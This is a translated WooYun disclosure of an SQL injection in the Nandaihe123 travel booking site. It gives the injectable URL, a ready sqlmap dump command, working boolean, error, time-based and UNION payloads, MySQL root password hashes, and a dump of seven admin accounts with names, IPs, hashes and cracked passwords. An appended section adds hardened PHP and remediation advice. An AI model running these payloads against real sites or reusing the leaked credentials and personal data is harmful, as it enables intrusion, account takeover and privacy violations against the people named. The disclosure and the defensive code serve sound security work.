
Vulnerability summary

Defect ID: wooyun-2015-0152479

Title: SQL injection in Nandaihe123 Booking (南戴河123订房网) (DBA privileges / root password hash leak / large-scale user password leak)

Vendor: Nandaihe123 Booking (南戴河123订房网)

Author: 路人甲

Submitted: 2015-11-08 21:12

Fix deadline: 2015-12-23 21:14

Published: 2015-12-23 21:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-08: Actively contacting the vendor and waiting for it to claim the report; details withheld from the public
2015-12-23: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Nandaihe123 Booking (www.nandaihe123.com) is a professional travel booking site for the Nandaihe area. It went into operation in 2013 as a travel commerce platform serving tourism businesses in the Qinhuangdao region and visitors to Nandaihe and Beidaihe, and as a communication hub for travel enthusiasts and the general public. Its content covers dining, lodging, transport, sightseeing, shopping and entertainment, giving visitors detailed destination guides and travel product descriptions and making full use of the convenience and two-way interactivity of the internet. It is a further service platform for the natural and cultural scenery of Nandaihe and Beidaihe ("sunshine, beaches, sea and the Great Wall").
Nandaihe123 Booking (www.nandaihe123.com) employs a team of professionals with experience in hotel management and tourism reception. Under the service motto "integrity, efficiency, diligence, mutual benefit", it offers visitors one-stop ticketing, room booking, car rental and guide services.

Detailed description:

URL: http://www.nandaihe123.com/family/family_show.php?id=76

python sqlmap.py -u "http://www.nandaihe123.com/family/family_show.php?id=76" --random-agent -p id --technique=BETU --batch -D nandaihe123 -T admin -C ID,AdminID,UserName,PassWord,IP --dump

Proof of vulnerability:

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=76 AND 4089=4089
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=76 AND (SELECT 5632 FROM(SELECT COUNT(*),CONCAT(0x71716a6b71,(SELECT (ELT(5632=5632,1))),0x717a706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=76 AND (SELECT * FROM (SELECT(SLEEP(5)))rCSJ)
Type: UNION query
Title: MySQL UNION query (50) - 56 columns
Payload: id=-5172 UNION ALL SELECT 50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,CONCAT(0x71716a6b71,0x506f7055417a4a6142497750424b794d6969745a566a684949504c7a6e4c5858776652507a416a74,0x717a706b71),50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50#
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user: 'root@%'
current user is DBA: True
database management system users [2]:
[*] 'root'@'%'
[*] 'zszy168'@'localhost'
database management system users password hashes:
[*] root [1]:
password hash: *617855EFC73CBED64B39D9746ABE04457A9EAA0E
[*] zszy168 [1]:
password hash: *7D3E1A2B2E27BE19FCA24C162FC4B28AE7417D53


Tables containing password-related columns (sqlmap column search across all databases):

Database: mijiang
Table: admin
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: mijiang
Table: user
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: qhdxtd
Table: ecs_users
[3 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| passwd_answer | varchar(255) |
| passwd_question | varchar(50) |
| password | varchar(32) |
+-----------------+--------------+
Database: qhdxtd
Table: ecs_virtual_card
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| card_password | varchar(60) |
+---------------+-------------+
Database: qhdxtd
Table: ecs_admin_user
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: straw-win
Table: admin
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: dongdaihe
Table: ndh_http
[1 column]
+--------+--------------+
| Column | Type |
+--------+--------------+
| passwd | varchar(255) |
+--------+--------------+
Database: dongdaihe
Table: ndh_lghy
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: dongdaihe
Table: ndh_membasic
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| m_passwd | varchar(255) |
+----------+--------------+
Database: dongdaihe
Table: ndh_yewu
[1 column]
+--------+--------------+
| Column | Type |
+--------+--------------+
| passwd | varchar(255) |
+--------+--------------+
Database: chinassrc
Table: admin
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: nandaihe123
Table: user_bs
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: nandaihe123
Table: admin
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: nandaihe123
Table: ndh_lghy
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: nandaihe123
Table: user_jtlg
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: nandaihe123
Table: ndh_http
[1 column]
+--------+--------------+
| Column | Type |
+--------+--------------+
| passwd | varchar(255) |
+--------+--------------+
Database: nandaihe123
Table: user_bgjd
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: nandaihe123
Table: user
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| PassWord | varchar(100) |
+----------+--------------+
Database: nandaihe123
Table: ndh_membasic
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| m_passwd | varchar(255) |
+----------+--------------+
Database: nandaihe123
Table: ndh_yewu
[1 column]
+--------+--------------+
| Column | Type |
+--------+--------------+
| passwd | varchar(255) |
+--------+--------------+
Database: nandaihe123
Table: user_staff
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: nandaihe123
Table: user_dy
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: mysql
Table: user
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| Password | char(41) |
+----------+----------+
Database: mysql
Table: servers
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| Password | char(64) |
+----------+----------+
Database: klsh
Table: sup_user
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| PassWord | varchar(100) |
+----------+--------------+
Database: klsh
Table: sys_admin
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| PassWord | varchar(100) |
+----------+--------------+
Database: klsh
Table: trade_user
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| PassWord | varchar(100) |
+----------+--------------+
Database: jobqhd
Table: qs_members
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(100) |
+----------+--------------+
Database: jobqhd
Table: qs_gifts
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(160) |
+----------+--------------+
Database: trwpc
Table: admin
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: esc
Table: admin
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: esc
Table: user
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| PassWord | varchar(200) |
+----------+--------------+
Database: qhdjd
Table: admin
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: qhdjd
Table: user
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: qhdqx
Table: user
[1 column]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| userpassword | varchar(100) |
+--------------+--------------+
Database: goucaiw
Table: admin
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: goucaiw
Table: ecs_users
[3 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| passwd_answer | varchar(255) |
| passwd_question | varchar(50) |
| password | varchar(32) |
+-----------------+--------------+
Database: goucaiw
Table: ecs_virtual_card
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| card_password | varchar(60) |
+---------------+-------------+
Database: goucaiw
Table: ecs_goods
[1 column]
+---------+---------+
| Column | Type |
+---------+---------+
| is_pass | int(10) |
+---------+---------+
Database: goucaiw
Table: user
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: goucaiw
Table: ecs_admin_user
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: zszy168
Table: destoon_photo_12
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(30) |
+----------+-------------+
Database: zszy168
Table: destoon_member
[2 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| passport | varchar(30) |
| password | varchar(32) |
+----------+-------------+
Database: zszy168
Table: destoon_finance_card
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(30) |
+----------+-------------+
Database: zszy168
Table: destoon_group_order
[1 column]
+----------+------------+
| Column | Type |
+----------+------------+
| password | varchar(6) |
+----------+------------+
Database: zszy168
Table: destoon_login
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: petly
Table: pre_forum_forumfield
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(12) |
+----------+-------------+
Database: petly
Table: pre_common_member
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: petly
Table: pre_home_album
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(10) |
+----------+-------------+
Database: petly
Table: pre_home_blog
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(10) |
+----------+----------+
Database: petly
Table: pre_ucenter_members
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: wtj
Table: admin
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: axyg
Table: pre_forum_forumfield
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(12) |
+----------+-------------+
Database: axyg
Table: pre_common_member
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: axyg
Table: pre_home_album
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(10) |
+----------+-------------+
Database: axyg
Table: pre_home_blog
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(10) |
+----------+----------+
Database: axyg
Table: pre_ucenter_members
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: unxun
Table: admin
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: unxun
Table: user
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+


One table selected for a test dump:

Database: nandaihe123
Table: admin
[7 entries]
+----+---------+----------+-------------------------------------------+---------------+
| ID | AdminID | UserName | PassWord | IP |
+----+---------+----------+-------------------------------------------+---------------+
| 1 | admin | 安荣超 | 00c66aaf5f2c3f49946f15c1ad2ea0d3 (123455) | 120.6.139.15 |
| 25 | zr | 赵锐 | 734056edd0b94138498f5e153c21d6d7 | 120.6.152.84 |
| 32 | lxy | 李秀艳 | 923008396284aa23c5993cf446e5ffa6 (130305) | 120.6.142.124 |
| 33 | yxq | 杨晓清 | 4297f44b13955235245b2497399d7a93 (123123) | 120.6.160.146 |
| 53 | cxl | 陈小丽 | e10adc3949ba59abbe56e057f20f883e (123456) | 120.6.152.84 |
| 54 | zhn | 张宏娜 | e10adc3949ba59abbe56e057f20f883e (123456) | 120.6.179.35 |
| 58 | lzd | 刘志丹 | e10adc3949ba59abbe56e057f20f883e (123456) | 120.6.167.35 |
+----+---------+----------+-------------------------------------------+---------------+

Remediation:

Add input filtering.
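The remediation above is the whole of the reporter's advice. The following is an added example, not the reporter's code and not the site's actual family_show.php (its source is not on the page): it shows the string-concatenation pattern that the sqlmap results imply, and next to it a hardened version of the same lookup that validates the id parameter and binds it with a prepared statement. The table name `family`, its columns, and the database credentials are hypothetical; the mysqli calls used are the ones available in PHP 5.2, which is the version the sqlmap fingerprint reports.

```php
<?php
// Added example; not the reporter's code, and not the real family_show.php.
// Table `family` and its columns are hypothetical.

// BEFORE (the pattern the findings imply): $_GET['id'] is spliced straight into
// the SQL text, so every payload in the report (boolean-based, error-based,
// time-based and UNION ALL SELECT ...) is executed as part of the query.
function family_show_vulnerable(mysqli $db, $id) {
    $sql = "SELECT id, title, body FROM family WHERE id=" . $id;
    return $db->query($sql);
}

// AFTER (hardened): reject anything that is not a plain decimal integer, then
// bind the value as a parameter. The bound value travels separately from the
// statement text, so it can never alter the query's structure even if the
// validation were somehow bypassed. bind_result() is used instead of
// get_result() because the latter needs mysqlnd (PHP 5.3+).
function family_show_safe(mysqli $db, $id) {
    // $_GET values may be arrays (id[]=1), so check the type before ctype_digit().
    if (!is_string($id) || !ctype_digit($id) || strlen($id) > 10) {
        header('HTTP/1.1 400 Bad Request');
        return null;
    }
    $stmt = $db->prepare('SELECT id, title, body FROM family WHERE id = ?');
    if ($stmt === false) {
        return null;
    }
    $idInt = (int) $id;
    $stmt->bind_param('i', $idInt);   // 'i': integer parameter
    $stmt->execute();
    $stmt->bind_result($rowId, $title, $body);
    $row = $stmt->fetch()
        ? array('id' => $rowId, 'title' => $title, 'body' => $body)
        : null;
    $stmt->close();
    return $row;
}

// Usage (hypothetical credentials): connect as a low-privilege account that can
// only read the tables this page needs. The report shows the application running
// as 'root'@'%' with DBA rights, which is what turned one injectable parameter
// into a dump of every database on the server.
$db  = new mysqli('localhost', 'web_readonly', 'PLACEHOLDER_PASSWORD', 'nandaihe123');
$row = family_show_safe($db, isset($_GET['id']) ? $_GET['id'] : '');
```

Two further points follow from the report's own output. The `current user: 'root@%'` and `current user is DBA: True` lines mean the web application's database account is the MySQL superuser and may log in from any host; restricting the application to a dedicated account with SELECT on its own schema limits what any future injection can reach. Separately, the dumped admin table stores 32-character hex digests that sqlmap cracked to six-digit values in seconds, so fixing the injection does not by itself protect those credentials; they should be reset and stored with a salted, slow hash (crypt() with bcrypt is available from PHP 5.3, password_hash() from PHP 5.5), and the PHP 5.2.17 runtime the server reports has been end-of-life since 2011 and should be upgraded.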

Copyright notice: when reposting, credit the source: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused the report